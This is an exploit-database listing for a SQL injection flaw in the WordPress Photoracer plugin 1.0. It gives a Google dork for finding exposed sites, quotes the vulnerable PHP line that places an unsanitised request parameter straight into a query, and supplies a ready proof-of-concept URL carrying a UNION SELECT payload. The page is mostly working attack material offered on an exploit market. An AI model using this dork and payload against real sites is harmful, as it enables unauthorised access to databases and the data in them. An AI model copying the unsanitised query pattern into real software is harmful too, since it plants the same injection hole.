[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress Photoracer plugin <= 1.0 SQL Injection Vulnerability

Author
evilsocket
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16765
Category
web applications
Date add
26-08-2011
Platform
php
# Exploit Title: WordPress Photoracer plugin <= 1.0 SQL Injection Vulnerability
# Google Dork: inurl:"wp-content/plugins/photoracer/viewimg.php"
# Date: 2011-08-26
# Author: evilsocket ( evilsocket [at] gmail [dot] com )
# Software Link: http://wordpress.org/extend/plugins/photoracer/
# Version: 1.0
 
---------------
Vulnerable code
---------------
 
[ viewimg.php line 16 ]
 
$imgid = $_REQUEST['id'];
$q1 = "select raceid, wpuid, imgid, imgpath, imgname, imgcomment, sumvotes, imgcountview, tinsert from ".
    $wpdb->prefix."photoracer where imgid=$imgid";  
 
$out = $wpdb->get_row($q1);
 
---
PoC
---
 
http://www.site.com/wp-content/plugins/photoracer/viewimg.php?id=-1 UNION SELECT 0,1,2,3,4,VERSION(),6,7,8



#  0day.today [2024-11-16]  #